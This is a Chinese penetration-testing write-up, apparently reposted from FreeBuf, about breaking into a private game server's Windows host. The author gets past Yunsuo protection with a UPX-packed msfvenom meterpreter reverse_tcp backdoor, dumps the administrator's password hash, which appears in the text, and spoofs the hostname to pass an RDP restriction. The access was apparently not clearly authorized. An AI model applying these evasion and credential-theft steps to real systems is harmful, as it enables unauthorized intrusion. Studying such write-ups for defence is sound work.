“撬锁”实战:绕过云锁提权某游戏私服

2018 年 8 月 13 日 FreeBuf

严正声明:本文仅限于技术讨论与分享,严禁用于非法途径

前言

朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看。本文仅为大家提供一个思路,这个方法可能很多人知道但是并没有公布到网络。我今天写出来只是为了让小白们少走一点弯路,开拓一下思路,还请大牛勿喷。

请注意:本次测试已经通知管理员并已帮助其修复漏洞!

背景

朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看。

无形之锁

连接上shell以后执行whoami:

一看2008的服务器,直接就是system权限,心里还想着这有什么不好提的。当然既然朋友说提不下,肯定没有那么简单。

执行tasklist /svc 查看运行中的任务列表:

发现有云锁。

执行net user查看系统用户:

发现云锁禁用了net。

老司机都知道,如果是安全狗就好办,只要是默认的设置,找个可读可写可执行的目录上传一个net.exe即可。但是云锁在这方面要比安全狗高明一点,你无论传到哪个目录都是不可以被执行的。本着严谨求实的态度,我还是传一下试试:

不出所料,换思路。

撬“锁”之路

其实net被禁用了没有关系,毕竟咱们是system权限,可以直接把管理员的账号密码给读取出来。

云锁终究是服务器防护软件,兼有杀毒的功能,如果是默认设置,getpassword的exp在执行过程中会被拦截。

本着严谨求实的态度,我还是读一下试试:

果然一片空白。

但是毕竟云锁可能更偏重于web应用的防护,对于可执行文件的杀毒效果远远不如360卫士之类。我们可以用msf多次编码并且加壳生成一个相对免杀云锁的后门。

具体的免杀思路我就不再赘述,freebuf以前发过类似的文章。我在这里执行的命令如下:

msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcpLHOST=xxxxx LPORT=xxxx -e x86/shikata_ga_nai -i 5 -f exe > /root/testtest.exe

然后用upx加个壳:

upx -6 /root/testtest.exe

传到目标服务器上,执行。

然后开始在msf上监听:

用msf执行下命令:

确认是目标机。

反弹出来照样调用不了net。

上hashdump:

结果如下:

wuhuijun:500:aad3b435b51404eeaad3b435b51404ee:5eb5f692224005cfd316b84f7d459d06:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

看来管理员名称为:wuhuijun。

解密hash:

密码到手。

然后就开开心心去连接mstsc。

远程端口是默认的3389:

看到这个界面,心里一阵激动。

然而事情并没有那么简单。

对方设置了计算机名限制。可能很多人到这里就会被卡住放弃。

因为如果是安全狗的话大家都知道去替换他保存计算机名的配置文件,但是云锁的话并没有这个操作。

重点思路就在这里:

因为我们毕竟已经是system权限了,我们除了关闭云锁几乎无所不能;

那么我们只要想办法弄到管理员登录的计算机名就可以了。

Windows上以文本形式输出用户登录日志 (100条数目作为数量限制)的命令如下:

wevtutil.exe qe security "/q:*[System [(EventID=4624)]]"/f:text /rd:true /c:100 > c:\sys.txt

导出后然后保存到本地查看。

远程登录的类型为3,我们只需要查找类型为3的日志:

可以看到,允许远程登录的计算机名为PC-20180525EFUP。

接下来就是修改本地计算机名:

保存重启电脑,然后去连接服务器。

成功登录:

总结

其实思路并不难,兵来将挡水来土掩,学会把手中的权限利用到极致。

本次测试仅仅作为学习,漏洞已经提交给管理员,请勿用于非法用途,所产生的一切后果与作者无关。文章如果有问题,欢迎大家及时指正,如果有什么新的想法也欢迎与我交流!

*本文作者:道恩先生666,转载请注明来自FreeBuf.COM

登录查看更多
0

相关内容

【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
【实用书】学习用Python编写代码进行数据分析,103页pdf
专知会员服务
192+阅读 · 2020年6月29日
干净的数据:数据清洗入门与实践,204页pdf
专知会员服务
161+阅读 · 2020年5月14日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
【干货书】流畅Python,766页pdf,中英文版
专知会员服务
224+阅读 · 2020年3月22日
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
PC微信逆向:两种姿势教你解密数据库文件
黑客技术与网络安全
16+阅读 · 2019年8月30日
msf实现linux shell反弹
黑白之道
49+阅读 · 2019年8月16日
渗透某德棋牌游戏
黑白之道
12+阅读 · 2019年5月17日
7 款实用到哭的App,只说一遍
高效率工具搜罗
84+阅读 · 2019年4月30日
GitHub超2.7万星,最全Python入门算法来了
新智元
5+阅读 · 2019年4月28日
抖音爬虫
专知
3+阅读 · 2019年2月11日
实战 | 40行代码实现人脸识别
七月在线实验室
3+阅读 · 2018年3月7日
如何用人工智能秒杀超级马里奥游戏
AI100
5+阅读 · 2018年1月8日
用 Scikit-Learn 和 Pandas 学习线性回归
Python开发者
9+阅读 · 2017年9月26日
Arxiv
5+阅读 · 2018年10月4日
Relational Deep Reinforcement Learning
Arxiv
10+阅读 · 2018年6月28日
Arxiv
3+阅读 · 2017年11月21日
VIP会员
相关VIP内容
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
【实用书】学习用Python编写代码进行数据分析,103页pdf
专知会员服务
192+阅读 · 2020年6月29日
干净的数据:数据清洗入门与实践,204页pdf
专知会员服务
161+阅读 · 2020年5月14日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
【干货书】流畅Python,766页pdf,中英文版
专知会员服务
224+阅读 · 2020年3月22日
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
相关资讯
PC微信逆向:两种姿势教你解密数据库文件
黑客技术与网络安全
16+阅读 · 2019年8月30日
msf实现linux shell反弹
黑白之道
49+阅读 · 2019年8月16日
渗透某德棋牌游戏
黑白之道
12+阅读 · 2019年5月17日
7 款实用到哭的App,只说一遍
高效率工具搜罗
84+阅读 · 2019年4月30日
GitHub超2.7万星,最全Python入门算法来了
新智元
5+阅读 · 2019年4月28日
抖音爬虫
专知
3+阅读 · 2019年2月11日
实战 | 40行代码实现人脸识别
七月在线实验室
3+阅读 · 2018年3月7日
如何用人工智能秒杀超级马里奥游戏
AI100
5+阅读 · 2018年1月8日
用 Scikit-Learn 和 Pandas 学习线性回归
Python开发者
9+阅读 · 2017年9月26日
Top
微信扫码咨询专知VIP会员